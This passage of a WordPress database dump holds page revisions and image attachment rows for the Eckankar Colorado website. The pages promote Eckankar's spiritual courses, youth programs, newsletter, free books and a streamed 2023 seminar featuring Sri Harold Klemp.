class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Home','','inherit','closed','closed','','7160-revision-v1','','','2023-11-18 13:36:40','2023-11-18 20:36:40','',7160,'https://eckankar-colorado.org/?p=269401',0,'revision','',0),(269402,2,'2023-11-18 13:44:54','2023-11-18 20:44:54','','winter-misty trees-2','','inherit','closed','closed','','winter-misty-trees-2','','','2023-11-18 13:44:54','2023-11-18 20:44:54','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/11/winter-misty-trees-2.jpg',0,'attachment','image/jpeg',0),(269403,2,'2023-11-20 13:25:22','2023-11-20 20:25:22','','meetup-img-1-11-3-2023','','inherit','closed','closed','','meetup-img-1-11-3-2023','','','2023-11-20 13:25:22','2023-11-20 20:25:22','',7160,'https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg',0,'attachment','image/jpeg',0),(269405,2,'2023-11-20 13:27:46','2023-11-20 20:27:46','','freebooks-img-5-11-3-2023','','inherit','closed','closed','','freebooks-img-5-11-3-2023','','','2023-11-20 13:27:46','2023-11-20 20:27:46','',7160,'https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg',0,'attachment','image/jpeg',0),(269404,2,'2023-11-20 13:26:51','2023-11-20 20:26:51','','newsletter-img-2-11-3-2023','','inherit','closed','closed','','newsletter-img-2-11-3-2023','','','2023-11-20 13:26:51','2023-11-20 20:26:51','',7160,'https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg',0,'attachment','image/jpeg',0),(269407,2,'2023-11-20 13:32:38','2023-11-20 20:32:38','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" 